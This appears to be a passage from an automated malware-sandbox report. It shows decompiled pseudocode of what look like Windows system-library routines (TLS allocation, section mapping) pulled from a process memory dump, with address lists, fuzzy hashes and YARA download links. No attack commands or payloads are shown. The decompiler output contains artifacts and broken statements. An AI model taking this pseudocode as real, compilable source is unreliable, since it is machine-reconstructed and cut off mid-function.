								_t193 = E0362A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E0360FFB0(_t193, _t235, 0x36e8550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L036177F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L036177F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x36e7b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x36e7b10; // 0x8
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E036337C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x36e7b9c; // 0x0
									_t214 = L03614620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E036337F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x36e7b10 =  *0x36e7b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x36e7b04 =  *0x36e7b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L036177F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L036177F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x36e7b08 =  *0x36e7b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E036357C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E0363F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L036177F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E0362A44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L036177F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E036396C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

0x0360849b
0x0360849b
0x0360849b
0x0360849b
0x0360849d
0x036084a2
0x036084a7
0x036084b1
0x036084d8
0x00000000
0x036084b3
0x036084c4
0x036084c9
0x036084cd
0x036084cf
0x036084cf
0x036084d6
0x036084e6
0x036084e9
0x036084ec
0x036084ef
0x036084f2
0x036084f4
0x036084fc
0x03608501
0x03608506
0x03608509
0x036086e0
0x036086e5
0x036086e8
0x036086ed
0x036086f0
0x036086f2
0x03659afd
0x03659b02
0x036084da
0x036084df
0x036084df
0x036086fa
0x036086fd
0x036086fe
0x03608701
0x03608706
0x03608709
0x0360870b
0x00000000
0x00000000
0x03608711
0x03608725
0x03608727
0x0360872a
0x0360872c
0x03659af0
0x03659af5
0x03608732
0x03608732
0x03608732
0x03608735
0x03608737
0x03608515
0x03608515
0x03608518
0x0360851d
0x03608523
0x03608527
0x0360852b
0x03608537
0x03608539
0x0360853c
0x0360853e
0x0360868c
0x03608691
0x03608699
0x0360869b
0x03608744
0x03608748
0x036086a1
0x036086a1
0x036086a1
0x036086a4
0x036086a8
0x03659bdf
0x03659bdf
0x036086ae
0x036086b0
0x00000000
0x036086b6
0x00000000
0x03659be9
0x036086b0
0x03608544
0x0360854a
0x0360854d
0x03608551
0x0360876e
0x03608778
0x0360877b
0x03608780
0x03608557
0x03608557
0x0360855d
0x0360855d
0x0360856b
0x0360856e
0x03608570
0x03608573
0x03608576
0x03608576
0x03608579
0x0360857b
0x00000000
0x00000000
0x03608581
0x036085a0
0x036085a2
0x036085a5
0x036085a7
0x03659b1b
0x03659b1b
0x0360862e
0x0360862e
0x03608631
0x03608631
0x03608634
0x03608636
0x03608669
0x03608669
0x0360866b
0x03659bbf
0x03659bc4
0x03659bc8
0x03659bce
0x03659bce
0x03608671
0x03608671
0x03608674
0x03608676
0x03659bae
0x03659bae
0x03608676
0x0360867c
0x0360867e
0x03608688
0x03608688
0x00000000
0x0360867e
0x03608638
0x03608638
0x0360863b
0x0360863e
0x0360863f
0x03608642
0x03608645
0x03608648
0x0360864d
0x03659b69
0x03659b6e
0x03659b7b
0x03659b81
0x03659b85
0x03659b89
0x03659ba7
0x03659b8b
0x03659b91
0x03659b9a
0x03659b9f
0x03659b9f
0x03608788
0x0360878d
0x03608763
0x03608763
0x03608766
0x00000000
0x03608766
0x03659b70
0x00000000
0x03659b70
0x03608656
0x0360865a
0x0360865c
0x03608752
0x03608756
0x00000000
0x00000000
0x0360875e
0x00000000
0x0360875e
0x03608662
0x03608662
0x03608662
0x03608666
0x00000000
0x03608666
0x036085b7
0x036085b9
0x036085bc
0x036085bf
0x036085cc
0x036085d1
0x036085d4
0x036085db
0x036085de
0x036085e0
0x03659b5f
0x00000000
0x03659b5f
0x036085e6
0x036085ea
0x036086c3
0x036086c5
0x036086c8
0x036086ca
0x03659b16
0x00000000
0x03659b16
0x036086d6
0x036085f6
0x036085f6
0x036085f9
0x03608602
0x03608606
0x0360860a
0x0360860b
0x0360860e
0x03608611
0x00000000
0x03608611
0x036085f3
0x00000000
0x036085f3
0x03608619
0x0360861e
0x0360861e
0x03608621
0x03608622
0x03608623
0x03608625
0x0360862c
0x00000000
0x0360873d
0x00000000
0x0360873d
0x03608737
0x0360850f
0x03608512
0x00000000
0x03608512
0x00000000
0x036084d6

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbaf284af84d4f7f656e6579280a22a0d1c24ca5f19923b46cfed517c4fea0f3
Instruction ID: 5292a881f550de190d76c5755695354479eb58bc2782dd4d7d6dbcb2adb35e9c
Opcode Fuzzy Hash: dbaf284af84d4f7f656e6579280a22a0d1c24ca5f19923b46cfed517c4fea0f3
Instruction Fuzzy Hash: 28B17A74E00309DFDB19DFA8C985AAEFBB9BF48304F14412DE415AB385DB70A956CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0362513A, Relevance: .3, Instructions: 258
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0362513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x36ed360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E0363D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E03612280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L03614620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E0363F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E0360FFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x36eb1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E0363B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}

0x03625142
0x0362514c
0x03625150
0x03625157
0x03625159
0x0362515e
0x03625165
0x03625169
0x0362516c
0x03625172
0x03625176
0x0362517a
0x0362517a
0x0362517a
0x0362517f
0x03666d8b
0x03666d8e
0x03666d91
0x03666d95
0x03666d98
0x03666d9c
0x03666da0
0x03666da3
0x03666da7
0x03666e26
0x03666e26
0x03666e2a
0x036251f9
0x036251f9
0x036251fe
0x03666e33
0x03666e33
0x03666e39
0x03666e3d
0x03666e46
0x03666e50
0x00000000
0x00000000
0x03666e52
0x03666e53
0x03666e56
0x03666e5d
0x00000000
0x00000000
0x00000000
0x03666e5f
0x03666e67
0x03666e77
0x03666e7f
0x03666e80
0x03666e88
0x03666e90
0x03666e9f
0x03666ea5
0x03666ea9
0x03666eb1
0x03666ebf
0x00000000
0x00000000
0x03666ecf
0x03666ed3
0x00000000
0x00000000
0x03666edb
0x03666ede
0x03666ee1
0x03666ee8
0x03666eeb
0x03666eed
0x03666ef0
0x03666ef4
0x03666ef8
0x03666efc
0x00000000
0x00000000
0x03666f0d
0x03666f11
0x03666f32
0x03666f37
0x03666f3b
0x03666f3e
0x03666f41
0x03666f46
0x00000000
0x00000000
0x03666f4c
0x03666f50
0x03666f50
0x03666f54
0x03666f62
0x03666f65
0x03666f6d
0x03666f7b
0x03666f7b
0x03666f93
0x03666f98
0x03666fa0
0x03666fa6
0x03666fb3
0x03666fb6
0x03666fbf
0x03666fc1
0x03666fd5
0x03666fda
0x03666fda
0x03666fdd
0x03666fe2
0x03666fe7
0x03666feb
0x03666fef
0x03666ff3
0x0362520c
0x0362520c
0x0362520f
0x03625215
0x03625234
0x0362523a
0x0362523a
0x03625244
0x03625245
0x03625246
0x03625251
0x03625251
0x03666f13
0x03666f17
0x03666f17
0x03666f18
0x03666f1b
0x03666f1f
0x03666f23
0x00000000
0x03666f28
0x03625204
0x03625204
0x03625208
0x00000000
0x03625208
0x03625185
0x03625188
0x0362518a
0x0362518e
0x03625195
0x03666db1
0x03666db5
0x03666db9
0x0362519b
0x0362519b
0x0362519e
0x036251a7
0x036251a9
0x036251a9
0x036251b5
0x036251b8
0x036251bb
0x036251be
0x036251c1
0x036251c5
0x036251c9
0x036251cd
0x036251cd
0x036251d8
0x036251dc
0x036251e0
0x03666dcc
0x03666dd0
0x03666dd5
0x03666ddd
0x03666de1
0x03666de1
0x03666de5
0x03666deb
0x03666df1
0x03666df7
0x03666dfd
0x03666e01
0x03666e05
0x03666e09
0x03666e0d
0x03666e11
0x03666e11
0x036251eb
0x03666e1a
0x03666e1f
0x03666e21
0x03666e23
0x00000000
0x036251f1
0x036251f1
0x00000000
0x036251f1

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b41f05f2c69b42d862d3ae2568feb7acc1725eb00944531ca09b6c8a7ec1a594
Instruction ID: d77f5d43f534c2e4b71419421e966d661917ccbaa8e357c1a2cf954db0884831
Opcode Fuzzy Hash: b41f05f2c69b42d862d3ae2568feb7acc1725eb00944531ca09b6c8a7ec1a594
Instruction Fuzzy Hash: 7CC110755093809FD364CF28C580A5AFBE1BF89304F184A6EF99A8B392D771E845CB46

Uniqueness

Uniqueness Score: -1.00%

Function 036203E2, Relevance: .3, Instructions: 254
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E036203E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x36ed360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E03620548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E0363B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E0360B02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x36e7c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E03617D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E03617D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E03677016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E03639830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E036769A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x36e7c04 != 0) {
						_t118 = _v12;
						_t120 = E0367A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x36e7bd8;
						if( *0x36e7bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E036395D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E036399A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E03673540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E035FB1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E0363AAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x36e8474 - 3;
										if( *0x36e8474 != 3) {
											 *0x36e79dc =  *0x36e79dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E03617D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E03617D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E03677016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x36e8708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x36e7b00; // 0x0
							asm("ror esi, cl");
							 *0x36eb1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E036395D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E03607F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}

0x036203f1
0x036203f7
0x036203f9
0x036203fb
0x036203fd
0x03620400
0x0362040a
0x03664c7a
0x03620537
0x03620547
0x03620410
0x03620410
0x03620414
0x03620417
0x0362041a
0x03620421
0x03620424
0x0362042b
0x0362043b
0x0362043e
0x0362043f
0x0362043f
0x03620446
0x03620449
0x0362044c
0x0362044f
0x03620459
0x03664c8d
0x0362045f
0x0362045f
0x0362045f
0x03620467
0x03664c97
0x03664c9d
0x03664ca4
0x03664caa
0x03664caf
0x03664cb1
0x03664cc3
0x03664cb3
0x03664cbc
0x03664cbc
0x03664cc8
0x03664ccb
0x03664cd7
0x03664cda
0x03664cdf
0x03664cdf
0x03664ccb
0x03664ca4
0x0362046d
0x0362046f
0x0362046f
0x03620471
0x03620476
0x0362047a
0x0362047b
0x03620483
0x03620489
0x0362048d
0x00000000
0x00000000
0x03664ce9
0x03664cef
0x03664d22
0x03664d22
0x00000000
0x03664d22
0x03664cf1
0x03664cf7
0x00000000
0x00000000
0x03664cf9
0x03664cff
0x00000000
0x00000000
0x03664d05
0x03664d07
0x00000000
0x00000000
0x03664d0d
0x03664d0f
0x03664d14
0x03664d16
0x00000000
0x00000000
0x03664d1c
0x03664d1c
0x03620499
0x03620535
0x03620535
0x00000000
0x03620535
0x036204a6
0x03664d2c
0x03664d37
0x03664d39
0x03664d3b
0x00000000
0x00000000
0x03664d41
0x03664d48
0x03620527
0x0362052b
0x0362052d
0x03620530
0x03620530
0x00000000
0x0362052b
0x03664d4e
0x036204ac
0x036204ac
0x036204af
0x036204b2
0x036204b7
0x036204b9
0x036204bb
0x036204bd
0x036204bf
0x036204c5
0x036204c9
0x03664d53
0x03664d59
0x03664db9
0x03664dba
0x03664dbf
0x03664dc2
0x03664dc4
0x03664dc7
0x03664dce
0x00000000
0x03664dce
0x03664d5b
0x03664d61
0x00000000
0x00000000
0x03664d63
0x03664d69
0x00000000
0x00000000
0x03664d6b
0x03664d6e
0x03664d74
0x03664d76
0x03664d7c
0x03664d7e
0x03664d84
0x03664d89
0x03664d8c
0x03664d8d
0x03664d92
